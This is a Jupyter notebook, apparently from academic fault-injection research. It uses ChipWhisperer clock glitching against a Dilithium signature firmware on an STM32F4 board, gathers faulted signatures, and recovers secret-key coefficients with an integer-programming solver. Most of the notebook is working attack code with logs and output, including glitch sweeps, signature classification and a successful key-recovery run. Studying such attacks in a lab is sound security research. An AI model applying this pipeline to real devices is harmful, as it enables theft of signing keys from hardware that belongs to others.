# Dilithium - Glitches - Fixediter

In [1]:
SCOPETYPE = 'OPENADC'
PLATFORM = 'CW308_STM32F4'
SS_VER = 'SS_VER_2_1'

TIMEOUT = 640# using rej sampling
ITER_TARGET = 63

In [2]:
import logging
logging.basicConfig(level=logging.NOTSET)
logging.getLogger('io.github.alex1s.python-dilithium').setLevel(logging.WARNING)
logging.getLogger('gurobipy.gurobipy').setLevel(logging.WARNING) # please be quiet gurobi
logging.getLogger().setLevel(logging.DEBUG + 1) # default logger should not be used anyways!
__LOGGER = logging.getLogger('sigglitches')
__LOGGER.setLevel(logging.NOTSET)

we append the path so that we can use the chipwhisperer library

In [3]:
import sys
if '../../../software' not in sys.path:
    sys.path.append('../../../software')
if 'python-dilithium' not in sys.path:
    sys.path.append('python-dilithium')
if 'dilithium_solver' not in sys.path:
    sys.path.append('dilithium_solver')
sys.path

['/home/alexis/chipwhisperer.dilithium/jupyter/courses/fault101',
 '/usr/lib/python38.zip',
 '/usr/lib/python3.8',
 '/usr/lib/python3.8/lib-dynload',
 '',
 '/home/alexis/.venvs/chipwhisperer.dilithium/lib/python3.8/site-packages',
 '../../../software',
 'python-dilithium',
 'dilithium_solver']

In [4]:
import chipwhisperer as cw
import importlib
import json
import uuid
import numpy as np
import ipywidgets as widgets
from chipwhisperer.capture.targets import TargetIOError, TargetTimeoutError
from dilithium import Dilithium
import struct
import random
d = Dilithium(2)
cw, d

(<module 'chipwhisperer' from '/home/alexis/chipwhisperer.dilithium/jupyter/courses/fault101/../../../software/chipwhisperer/__init__.py'>,
 <dilithium.Dilithium at 0x7f30845f3b80>)

In [5]:
# what was the sk again?
d.pseudorandombytes_seed(b'attack-shuffling-countermeasure-keypair')
pk, sk = d.keypair()

In [6]:
%%bash -s "$PLATFORM" "$SS_VER"
cd ../../../hardware/victims/firmware/simpleserial-dilithium-ref
make PLATFORM=$1 CRYPTO_TARGET=NONE CRYPTO_OPTIONS=NONE SS_VER=$2

SS_VER set to SS_VER_2_1
SS_VER set to SS_VER_2_1
make[1]: '.dep' is up to date.
SS_VER set to SS_VER_2_1
.
Welcome to another exciting ChipWhisperer target build!!
arm-none-eabi-gcc (15:9-2019-q4-0ubuntu1) 9.2.1 20191025 (release) [ARM/arm-9-branch revision 277599]
Copyright (C) 2019 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

.
Compiling:
-en     simpleserial-dilithium-ref.c ...
mkdir -p "objdir-CW308_STM32F4"
-e Done!
.
Compiling:
-en     .././simpleserial/simpleserial.c ...
mkdir -p "objdir-CW308_STM32F4"
-e Done!
.
Compiling:
-en     .././hal/stm32f4/stm32f4_hal.c ...
mkdir -p "objdir-CW308_STM32F4"


In file included from .././hal/stm32f4/stm32f4_hal.c:3:
.././hal/stm32f4/stm32f4_hal_lowlevel.h:108: warning: "STM32F415xx" redefined
  108 | #define STM32F415xx
      | 
<command-line>: note: this is the location of the previous definition


-e Done!
.
Compiling:
-en     .././hal/stm32f4/stm32f4_hal_lowlevel.c ...
mkdir -p "objdir-CW308_STM32F4"


In file included from .././hal/stm32f4/stm32f4_hal_lowlevel.c:39:
.././hal/stm32f4/stm32f4_hal_lowlevel.h:108: warning: "STM32F415xx" redefined
  108 | #define STM32F415xx
      | 
<command-line>: note: this is the location of the previous definition


-e Done!
.
Compiling:
-en     .././hal/stm32f4/stm32f4_sysmem.c ...
mkdir -p "objdir-CW308_STM32F4"
-e Done!
.
Compiling:
-en     .././hal/stm32f4/stm32f4xx_hal_rng.c ...
mkdir -p "objdir-CW308_STM32F4"
-e Done!
.
Assembling: .././hal/stm32f4/stm32f4_startup.S
arm-none-eabi-gcc -c -mcpu=cortex-m4 -I. -x assembler-with-cpp -mthumb -mfloat-abi=soft -fmessage-length=0 -ffunction-sections -DF_CPU=7372800 -Wa,-gstabs,-adhlns=objdir-CW308_STM32F4/stm32f4_startup.lst -I.././simpleserial/ -I.././hal -I.././hal/stm32f4 -I.././hal/stm32f4/CMSIS -I.././hal/stm32f4/CMSIS/core -I.././hal/stm32f4/CMSIS/device -I.././hal/stm32f4/Legacy -I.././crypto/ .././hal/stm32f4/stm32f4_startup.S -o objdir-CW308_STM32F4/stm32f4_startup.o
.
LINKING:
-en     simpleserial-dilithium-ref-CW308_STM32F4.elf ...
-e Done!
.
Creating load file for Flash: simpleserial-dilithium-ref-CW308_STM32F4.hex
arm-none-eabi-objcopy -O ihex -R .eeprom -R .fuse -R .lock -R .signature simpleserial-dilithium-ref-CW308_STM32F4.elf simples

In [7]:
%run "../../Setup_Scripts/Setup_Generic_Dilithium.ipynb"

(ChipWhisperer NAEUSB WARNING|File naeusb.py:713) Your firmware (0.30) is outdated - latest is 0.64 See https://chipwhisperer.readthedocs.io/en/latest/firmware.html for more information


INFO: Found ChipWhisperer😍


In [8]:
fw_path = "../../../hardware/victims/firmware/simpleserial-dilithium-ref/simpleserial-dilithium-ref-{}.hex".format(PLATFORM)

#durs = []
#i = -1
while len(durs) < 200:
    i += 1
    try:
        start = time.time()
        target.sign(struct.pack('!H', i), timeout=2000)
        durs.append(time.time() - start)
        print(durs)
    except TargetIOError as e:
        print(e)
        target.reboot_flush()
import matplotlib.pyplot as plt
plt.plot(durs)

%matplotlib notebook
plt.scatter([i for i in range(len(durs))], durs)

In [9]:
#cw.program_target(scope, prog, fw_path)
#target.reboot_flush()

In [10]:
start = time.time()
target.scope.glitch.ext_offset = random.randint(3, 300)
target.scope.arm()
end = time.time()
duration = end - start
duration

0.0012094974517822266

In [11]:
# found using
# target.filter_msgs_one_iter([struct.pack('!H', i) for i in range(10)])
msgs_no_retry = [b'\x00\x01', b'\x00\x02', b'\x00\x07', b'\x00\t']
the_msg = msgs_no_retry[0]
the_msg = msgs_no_retry[2]

In [12]:
def dilithium2_polyz_unpack_settings():
    scope.default_setup()
    scope.cglitch_setup() # default_setup for clock glitching
    scope.clock.adc_src = "clkgen_x1" # we do not need x4 as we do not capture traces; maybe speedup?
    scope.adc.samples = 0 # maybe speedup?
    scope.adc.timeout = .000000002 # wtf why is this not working

def get_duration():
    dilithium2_polyz_unpack_settings()
    target.reboot_flush()
    scope.arm()
    target.loop(TIMEOUT)
    timed_out = scope.capture()
    assert not timed_out
    return scope.adc.trig_count;

def get_sig_correct() -> bytes:
    target.reboot_flush()
    dilithium2_polyz_unpack_settings()
    target.sign(the_msg, timeout=550 + 10000)
    return target.get_sig()

dilithium2_polyz_unpack_settings()
duration = get_duration()
iter_duration = duration // d._polyz_unpack_num_iters
print(f'clock cycle duration all = {duration}')
print(f'clock cycle duration iteration = {iter_duration}')
sig_correct = get_sig_correct()
_, z_correct, _ = d._unpack_sig(sig_correct)
poly_correct = z_correct[0]


verfiy_ok = d.verify(sig_correct, the_msg,pk)
print(f'Signature verification: {verfiy_ok}')
assert verfiy_ok, "jesus, the firmware is fucked or did we verify with the wrong message?"
z_correct

clock cycle duration all = 4698
clock cycle duration iteration = 73
Signature verification: True


array([[  63289, -117526,  -76006, ...,  109287,  -60474,   55670],
       [-126481,   11789,  125540, ...,   16254,  120134,   32961],
       [-129304,   43737,  -67208, ..., -127384,     619,   16628],
       [  17519,   90185,   66824, ...,   45158,  -32579,   10388]])

In [13]:
# old z without shuffle
#array([[-100321,   65070,    9592, ...,  103227,   -3425,   17889],
#       [-107453,  -81618,   31730, ...,  122362,  -45288,   23573],
#       [  88900, -128866, -104785, ...,  -48187, -104331,   71746],
#       [  -9268,   50775,   -6038, ..., -118320,  130605,  -62888]])

In [14]:
glitch_spots = [ITER_TARGET * 62 - 73]
width_start = 6.640625
width_stop = 6.640625
offset_start = 6.640625
offset_stop = 6.640625
msg_start = 0
msg_stop = 2 ** 16 -1
repeat = 1
step = 1
redo = 0

In [15]:
width_width = (width_stop - width_start + 1) / step
offset_width = (offset_stop - offset_start + 1) / step
ext_offset_width = len(glitch_spots)
print(width_width, offset_width, ext_offset_width)
normal_time = width_width * offset_width * ext_offset_width * redo
print(normal_time)
t = TIMEOUT * normal_time / 1000
print(f'Expected sig time: {t}s = {t/60}min = {t/3600}h')
t_all = t * 2.5 # what was that exactly again?
print(f'Expected sig + transfer time: {t_all}s = {t_all/60}min = {t_all/3600}h')

1.0 1.0 1
0.0
Expected sig time: 0.0s = 0.0min = 0.0h
Expected sig + transfer time: 0.0s = 0.0min = 0.0h


In [16]:
import chipwhisperer.common.results.glitch as glitch
gc = glitch.GlitchController(groups=["perfect", "success", "reset", "normal"], parameters=["width", "offset", "message"])
gc.display_stats()

IntText(value=0, description='perfect count:', disabled=True)

IntText(value=0, description='success count:', disabled=True)

IntText(value=0, description='reset count:', disabled=True)

IntText(value=0, description='normal count:', disabled=True)

FloatSlider(value=0.0, continuous_update=False, description='width setting:', disabled=True, max=10.0, readout…

FloatSlider(value=0.0, continuous_update=False, description='offset setting:', disabled=True, max=10.0, readou…

FloatSlider(value=0.0, continuous_update=False, description='message setting:', disabled=True, max=10.0, reado…

In [17]:
#zero_widget = widgets.IntText(value=0, description="zeros (max)", disabled=True)
#zero_widget

In [18]:
MIN_ZEROS = d.n *  2 # double to account for false positive classifications; may still be too little for late glitches
zeros = np.zeros(d.l)
zero_widgets = list((widgets.IntSlider(
    value=0,
    min=0,
    max=MIN_ZEROS + d.n, # most of the time we get a few more
    step=1,
    description=f"zeros[{i}]",
    disabled=True,
    continuous_update=True,
    orientation='horizontal',
    readout=True) for i in range(d.l)))
print(f'We need at least {MIN_ZEROS} zeros.')
display(*zero_widgets)

We need at least 512 zeros.


IntSlider(value=0, description='zeros[0]', disabled=True, max=768)

IntSlider(value=0, description='zeros[1]', disabled=True, max=768)

IntSlider(value=0, description='zeros[2]', disabled=True, max=768)

IntSlider(value=0, description='zeros[3]', disabled=True, max=768)

In [19]:
sigs_faulted = []
sigs_faulted_params = []

In [20]:
gc.set_range("offset", offset_start, offset_stop)
gc.set_range("width", width_start, width_stop)
gc.set_range("message", msg_start, msg_stop)
gc.set_global_step(step)
scope.glitch.repeat = repeat
target.reboot_flush()

b'\x00\x0bb\x07boot ok\xc1\x00'

In [21]:
def one_try(scope, target, gc, message_int, sigs_faulted: list, sigs_faulted_params: list) -> bool:
    new_zeros = np.zeros(d.l)
    param_tuple = (scope.glitch.width, scope.glitch.offset, message_int)
    message = struct.pack('!H', message_int)
    scope.arm()
    try:
        target.sign(message, TIMEOUT)
        
        trigger_timeout = scope.capture()
        if trigger_timeout:
            gc.add("reset", param_tuple)
            __LOGGER.info('fail due to trigger timeout')
            target.reboot_flush()
            return new_zeros
        
    except TargetTimeoutError as e:
        gc.add("reset", param_tuple)
        __LOGGER.info(f'failed due to read timeout: {e}')
        target.reboot_flush()
        return new_zeros
    except TargetIOError as e:
        gc.add("reset", param_tuple)
        __LOGGER.info(f'failed due to TargetIOError error: {e}')
        target.reboot_flush()
        return new_zeros
    else:
        try:
            sig_candidate_packed = target.get_sig()
            _, z_candidate, _ = d._unpack_sig(sig_candidate_packed)
            
            if np.all(z_candidate == z_correct):
                gc.add("normal", param_tuple)
                return new_zeros
            
            max_num_zero = np.sum(np.abs(z_candidate) <= d.beta)
            __LOGGER.info(f'We have at most faulted {max_num_zero} y coefficients to zero. (expected: {d.n - ITER_TARGET * d._polyz_unpack_coeffs_per_iter})')
            min_num_nonzero = np.sum(np.abs(z_candidate) > d.beta)
            min_num_zero_needed = d.n - ITER_TARGET * d._polyz_unpack_coeffs_per_iter
            if max_num_zero >= min_num_zero_needed:
                gc.add("perfect", param_tuple)

                # non trivial to estimate (at least for me, right now)
                # gc.add(f"perfect_{(min_num_nonzero - (d.l - 1) * d.n) // d._polyz_unpack_coeffs_per_iter}", param_tuple)
                new_zeros = np.sum(np.abs(z_candidate) <= d.beta, axis=1)
            
            gc.add("success", param_tuple)
            __LOGGER.info("Glitched! Ext offset: {} Offset: {} Width: {} Message:{}".format(scope.glitch.ext_offset, scope.glitch.offset, scope.glitch.width, message))
            
            sigs_faulted.append(sig_candidate_packed)
            sigs_faulted_params.append(param_tuple)
        except TargetIOError as e:
            gc.add("reset", param_tuple)
            __LOGGER.info(f'Failed to read sig: {e}')
            target.reboot_flush()
    return new_zeros

In [22]:
start_time = time.time()
do_break = False
for glitch_setting in gc.glitch_values():
    scope.glitch.offset = glitch_setting[1]
    scope.glitch.width = glitch_setting[0]
    message = glitch_setting[2]
    for i in glitch_spots:
        scope.glitch.ext_offset = i
        for j in range(redo + 1):
            new_zeros = one_try(scope, target, gc, message, sigs_faulted, sigs_faulted_params)
            zeros += new_zeros
            for i, zero_widget in enumerate(zero_widgets):
                zero_widget.value = zeros[i]
        if np.all(zeros > MIN_ZEROS):
            do_break = True
    if do_break:
        break
end_time = time.time()
total_duration = end_time - start_time
print(f'total duration: {total_duration}s {total_duration/60}min {total_duration/3600}h')

(ChipWhisperer Target WARNING|File SimpleSerial2.py:502) Read timed out: 
INFO:sigglitches:failed due to read timeout: Target cleanly timed out while generating a signature
(ChipWhisperer Target WARNING|File SimpleSerial2.py:502) Read timed out: 
INFO:sigglitches:failed due to read timeout: Target cleanly timed out while generating a signature
(ChipWhisperer Target WARNING|File SimpleSerial2.py:502) Read timed out: 
INFO:sigglitches:failed due to read timeout: Target cleanly timed out while generating a signature
(ChipWhisperer Target WARNING|File SimpleSerial2.py:502) Read timed out: 
INFO:sigglitches:failed due to read timeout: Target cleanly timed out while generating a signature
(ChipWhisperer Target WARNING|File SimpleSerial2.py:502) Read timed out: 
INFO:sigglitches:failed due to read timeout: Target cleanly timed out while generating a signature
(ChipWhisperer Target WARNING|File SimpleSerial2.py:502) Read timed out: 
INFO:sigglitches:failed due to read timeout: Target cleanly t

INFO:sigglitches:failed due to read timeout: Target cleanly timed out while generating a signature
(ChipWhisperer Target WARNING|File SimpleSerial2.py:502) Read timed out: 
INFO:sigglitches:failed due to read timeout: Target cleanly timed out while generating a signature
(ChipWhisperer Target WARNING|File SimpleSerial2.py:502) Read timed out: 
INFO:sigglitches:failed due to read timeout: Target cleanly timed out while generating a signature
INFO:sigglitches:We have at most faulted 7 y coefficients to zero. (expected: 4)
INFO:sigglitches:Glitched! Ext offset: 3833 Offset: 6.640625 Width: 6.640625 Message:b'\x002'
(ChipWhisperer Target WARNING|File SimpleSerial2.py:502) Read timed out: 
INFO:sigglitches:failed due to read timeout: Target cleanly timed out while generating a signature
(ChipWhisperer Target WARNING|File SimpleSerial2.py:502) Read timed out: 
INFO:sigglitches:failed due to read timeout: Target cleanly timed out while generating a signature
(ChipWhisperer Target WARNING|File

(ChipWhisperer Target WARNING|File SimpleSerial2.py:502) Read timed out: 
INFO:sigglitches:failed due to read timeout: Target cleanly timed out while generating a signature
(ChipWhisperer Target WARNING|File SimpleSerial2.py:502) Read timed out: 
INFO:sigglitches:failed due to read timeout: Target cleanly timed out while generating a signature
(ChipWhisperer Target WARNING|File SimpleSerial2.py:502) Read timed out: 
INFO:sigglitches:failed due to read timeout: Target cleanly timed out while generating a signature
INFO:sigglitches:We have at most faulted 8 y coefficients to zero. (expected: 4)
INFO:sigglitches:Glitched! Ext offset: 3833 Offset: 6.640625 Width: 6.640625 Message:b'\x00b'
(ChipWhisperer Target WARNING|File SimpleSerial2.py:502) Read timed out: 
INFO:sigglitches:failed due to read timeout: Target cleanly timed out while generating a signature
(ChipWhisperer Target WARNING|File SimpleSerial2.py:502) Read timed out: 
INFO:sigglitches:failed due to read timeout: Target cleanly

INFO:sigglitches:failed due to read timeout: Target cleanly timed out while generating a signature
(ChipWhisperer Target WARNING|File SimpleSerial2.py:508) Unexpected frame byte in CWbytearray(b'84 72 80 9d a9 2d cf e6 24 9b 9a 2f cc 10 b2 6b 79 9c 31 a6 a7 67 a9 c7 55 c0 23 98 b2 ec 1b 07 84 fe d4 22 bd 9d 1f b2 42 92 a6 d8 9a 27 b5 d0 d7 0f f6 ea d4 dd 18 f9 4d 98 bd a7 23 e6 4a 27 5f b0 5d 37 87 81 20 e0 8e 74 f5 38 a3 53 65 39 8e 81 19 d8 fa c9 b4 c8 bd 3b 1c ed 19 49 9e b3 06 18 aa a9 25 f4 fb e0 f2 55 33 7e 86 fa 42 70 04 a5 23 85 98 bf 97 5a e7 11 59 be f2 40 90 d6 05 fd 28 00 03')
INFO:SimpleSerial2Dilithium:got an BlockingIOError exception: target logger logged a warning during simpleserial_read: ["Unexpected frame byte in CWbytearray(b'84 72 80 9d a9 2d cf e6 24 9b 9a 2f cc 10 b2 6b 79 9c 31 a6 a7 67 a9 c7 55 c0 23 98 b2 ec 1b 07 84 fe d4 22 bd 9d 1f b2 42 92 a6 d8 9a 27 b5 d0 d7 0f f6 ea d4 dd 18 f9 4d 98 bd a7 23 e6 4a 27 5f b0 5d 37 87 81 20 e0 8e 74 f5 38 a3 53 65 39 8e 8

INFO:sigglitches:failed due to read timeout: Target cleanly timed out while generating a signature
(ChipWhisperer Target WARNING|File SimpleSerial2.py:502) Read timed out: 
INFO:sigglitches:failed due to read timeout: Target cleanly timed out while generating a signature
(ChipWhisperer Target WARNING|File SimpleSerial2.py:502) Read timed out: 
INFO:sigglitches:failed due to read timeout: Target cleanly timed out while generating a signature
INFO:sigglitches:We have at most faulted 8 y coefficients to zero. (expected: 4)
INFO:sigglitches:Glitched! Ext offset: 3833 Offset: 6.640625 Width: 6.640625 Message:b'\x00\xba'
(ChipWhisperer Target WARNING|File SimpleSerial2.py:502) Read timed out: 
INFO:sigglitches:failed due to read timeout: Target cleanly timed out while generating a signature
INFO:sigglitches:We have at most faulted 7 y coefficients to zero. (expected: 4)
INFO:sigglitches:Glitched! Ext offset: 3833 Offset: 6.640625 Width: 6.640625 Message:b'\x00\xbc'
INFO:sigglitches:We have a

...

INFO:sigglitches:failed due to read timeout: Target cleanly timed out while generating a signature
INFO:sigglitches:We have at most faulted 8 y coefficients to zero. (expected: 4)
INFO:sigglitches:Glitched! Ext offset: 3833 Offset: 6.640625 Width: 6.640625 Message:b'\x05\xdd'
(ChipWhisperer Target WARNING|File SimpleSerial2.py:502) Read timed out: 
INFO:sigglitches:failed due to read timeout: Target cleanly timed out while generating a signature
(ChipWhisperer Target WARNING|File SimpleSerial2.py:502) Read timed out: 
INFO:sigglitches:failed due to read timeout: Target cleanly timed out while generating a signature
(ChipWhisperer Target WARNING|File SimpleSerial2.py:502) Read timed out: 
INFO:sigglitches:failed due to read timeout: Target cleanly timed out while generating a signature
(ChipWhisperer Target WARNING|File SimpleSerial2.py:502) Read timed out: 
INFO:sigglitches:failed due to read timeout: Target cleanly timed out while generating a signature
(ChipWhisperer Target WARNING|F

INFO:sigglitches:We have at most faulted 8 y coefficients to zero. (expected: 4)
INFO:sigglitches:Glitched! Ext offset: 3833 Offset: 6.640625 Width: 6.640625 Message:b'\x06\x0c'
(ChipWhisperer Target WARNING|File SimpleSerial2.py:502) Read timed out: 
INFO:sigglitches:failed due to read timeout: Target cleanly timed out while generating a signature
(ChipWhisperer Target WARNING|File SimpleSerial2.py:502) Read timed out: 
INFO:sigglitches:failed due to read timeout: Target cleanly timed out while generating a signature
(ChipWhisperer Target WARNING|File SimpleSerial2.py:502) Read timed out: 
INFO:sigglitches:failed due to read timeout: Target cleanly timed out while generating a signature
(ChipWhisperer Target WARNING|File SimpleSerial2.py:502) Read timed out: 
INFO:sigglitches:failed due to read timeout: Target cleanly timed out while generating a signature
(ChipWhisperer Target WARNING|File SimpleSerial2.py:502) Read timed out: 
INFO:sigglitches:failed due to read timeout: Target clea

INFO:sigglitches:failed due to read timeout: Target cleanly timed out while generating a signature
INFO:sigglitches:We have at most faulted 8 y coefficients to zero. (expected: 4)
INFO:sigglitches:Glitched! Ext offset: 3833 Offset: 6.640625 Width: 6.640625 Message:b'\x06<'
INFO:sigglitches:We have at most faulted 8 y coefficients to zero. (expected: 4)
INFO:sigglitches:Glitched! Ext offset: 3833 Offset: 6.640625 Width: 6.640625 Message:b'\x06='
(ChipWhisperer Target WARNING|File SimpleSerial2.py:502) Read timed out: 
INFO:sigglitches:failed due to read timeout: Target cleanly timed out while generating a signature
(ChipWhisperer Target WARNING|File SimpleSerial2.py:502) Read timed out: 
INFO:sigglitches:failed due to read timeout: Target cleanly timed out while generating a signature
INFO:sigglitches:We have at most faulted 8 y coefficients to zero. (expected: 4)
INFO:sigglitches:Glitched! Ext offset: 3833 Offset: 6.640625 Width: 6.640625 Message:b'\x06@'
(ChipWhisperer Target WARNING|

(ChipWhisperer Target WARNING|File SimpleSerial2.py:502) Read timed out: 
INFO:sigglitches:failed due to read timeout: Target cleanly timed out while generating a signature
(ChipWhisperer Target WARNING|File SimpleSerial2.py:502) Read timed out: 
INFO:sigglitches:failed due to read timeout: Target cleanly timed out while generating a signature
(ChipWhisperer Target WARNING|File SimpleSerial2.py:502) Read timed out: 
INFO:sigglitches:failed due to read timeout: Target cleanly timed out while generating a signature
(ChipWhisperer Target WARNING|File SimpleSerial2.py:502) Read timed out: 
INFO:sigglitches:failed due to read timeout: Target cleanly timed out while generating a signature
(ChipWhisperer Target WARNING|File SimpleSerial2.py:502) Read timed out: 
INFO:sigglitches:failed due to read timeout: Target cleanly timed out while generating a signature
(ChipWhisperer Target WARNING|File SimpleSerial2.py:502) Read timed out: 
INFO:sigglitches:failed due to read timeout: Target cleanly t

total duration: 1842.1024107933044s 30.701706846555073min 0.5116951141092513h


In [23]:
result_data = {
    "sig_correct": list(sig_correct),
    "glitch_spots": list(glitch_spots),
    "width_start": width_start,
    "width_stop": width_stop,
    "offset_start": offset_start,
    "offset_stop": offset_stop,
    "repeat": repeat,
    "redo": redo,
    "repeat": repeat,
    "step": step,
    "sigs_faulted": list(map(lambda s: list(s), sigs_faulted)),
    "sigs_faulted_param_descripton": "0 = ext_offset, 1 = offset, 2 = width",
    "sigs_faulted_params": sigs_faulted_params
}
with open(f'iter2random{uuid.uuid4()}.json', 'w') as f:
    json.dump(result_data, f)
#json.dumps(result_data)

In [24]:
sigs_faulted_unpacked = list(map(lambda sig_packed: d._unpack_sig_full(sig_packed), sigs_faulted))
from dilithium_solver.signature import Signature, calculate_c_matrix_np
from dilithium_solver.recover_s_1_entry import recover_s_1_entry
from dilithium_solver.parameters import Parameters

params = Parameters.get_nist_security_level(d.nist_security_level)

sigs = list(map(
    lambda sig_faulted: Signature(
        sig_faulted[1],
        sig_faulted[0],
        calculate_c_matrix_np(sig_faulted[0], params)
    ), sigs_faulted_unpacked))
s_1_entry_index = 0


s_1 = d._unpack_sk(sk)[4]
timeout = 10
threshold = d.beta
for i in range(len(sigs_faulted_unpacked[0][1])): # long version of saying "l"
    result = recover_s_1_entry(sigs, i, s_1, params, 142387, timeout, threshold) # this number is not relevant
    print(result)

INFO:root:Before filter: 70912; after filter: 513; delta: 70399; threshold: 78
INFO:root:Total filtered: 513; true: 142387; false: -141874; false-positive rate: -27655.750487329435%; probability: nan


Set parameter Username
Academic license - for non-commercial use only - expires 2023-12-07
Set parameter TimeLimit to value 10
Set parameter Threads to value 4


INFO:root:Starting recovery of an entry. Will timeout after 10s. Current datetime is: 2022-12-20 14:56:26.172609


Gurobi Optimizer version 10.0.0 build v10.0.0rc2 (linux64)

CPU model: Intel(R) Core(TM) i7-6850K CPU @ 3.60GHz, instruction set [SSE2|AVX|AVX2]
Thread count: 6 physical cores, 6 logical processors, using up to 4 threads

Optimize a model with 1026 rows, 769 columns and 41040 nonzeros
Model fingerprint: 0x22bbe28e
Variable types: 0 continuous, 769 integer (513 binary)
Coefficient statistics:
  Matrix range     [1e+00, 1e+05]
  Objective range  [1e+00, 1e+00]
  Bounds range     [1e+00, 2e+00]
  RHS range        [1e+05, 1e+05]
Found heuristic solution: objective 12.0000000
Presolve time: 0.03s
Presolved: 1026 rows, 769 columns, 41040 nonzeros
Variable types: 0 continuous, 769 integer (513 binary)
Found heuristic solution: objective 32.0000000

Root relaxation: objective 5.019239e+02, 1124 iterations, 0.18 seconds (0.35 work units)

    Nodes    |    Current Node    |     Objective Bounds      |     Work
 Expl Unexpl |  Obj  Depth IntInf | Incumbent    BestBd   Gap | It/Node Time

     0 

INFO:root:Candidate is correct with same sign


...

H    0     0                     523.0000000  545.56855  4.32%     -    0s


INFO:root:Candidate is correct with same sign



Explored 1 nodes (1113 simplex iterations) in 0.31 seconds (0.44 work units)
Thread count was 4 (of 6 available processors)

Solution count 3: 523 32 15 

Solve interrupted
Best objective 5.230000000000e+02, best bound 5.450000000000e+02, gap 4.2065%

User-callback calls 194, time in user-callback 0.01 sec


INFO:root:We used 523.0 zero coefficients in y to recover the secret key.
INFO:root:Recovery took 0.311596155166626 seconds.
INFO:root:Successfully recovered s_1 entry!


(array([ 0., -1., -1.,  0.,  0., -1.,  2.,  2.,  0., -1.,  2.,  0.,  1.,
        0., -1.,  2., -1.,  2., -2., -2.,  2.,  1., -2.,  2.,  1.,  1.,
       -1., -1., -1., -2.,  2., -2.,  0., -2.,  1., -1.,  2., -2.,  2.,
        0., -2.,  2., -2.,  1.,  0.,  1., -2.,  0.,  2., -2., -1.,  2.,
        0.,  0.,  1.,  1., -2.,  0., -1.,  1., -2.,  1., -2., -1.,  1.,
        2., -1.,  2., -2., -1., -2., -1., -1.,  0.,  0., -1.,  2.,  1.,
        0.,  1.,  2.,  0., -2., -1.,  0., -2., -1., -2.,  2.,  2.,  2.,
        0.,  2., -2.,  0., -2.,  2., -1., -1., -1.,  0.,  2., -1.,  1.,
       -1., -1., -2.,  2., -1.,  0.,  2., -1.,  1.,  1.,  2.,  2.,  1.,
       -1.,  2., -1., -1.,  0.,  1.,  1.,  2.,  2., -1.,  1.,  1.,  2.,
        2.,  2., -2., -2.,  1.,  0.,  1.,  2.,  2.,  1.,  1., -1.,  2.,
        2.,  1., -1.,  0.,  2.,  0.,  1., -1.,  0.,  0.,  2., -2.,  1.,
        0.,  0.,  0.,  0.,  0.,  2., -2.,  1.,  0.,  1.,  0.,  0., -1.,
       -2., -1.,  1.,  1.,  1.,  0.,  0., -1.,  2.,  0., -2., -

In [25]:
scope.dis()
target.dis()

In [26]:
zeros

array([513., 541., 574., 557.])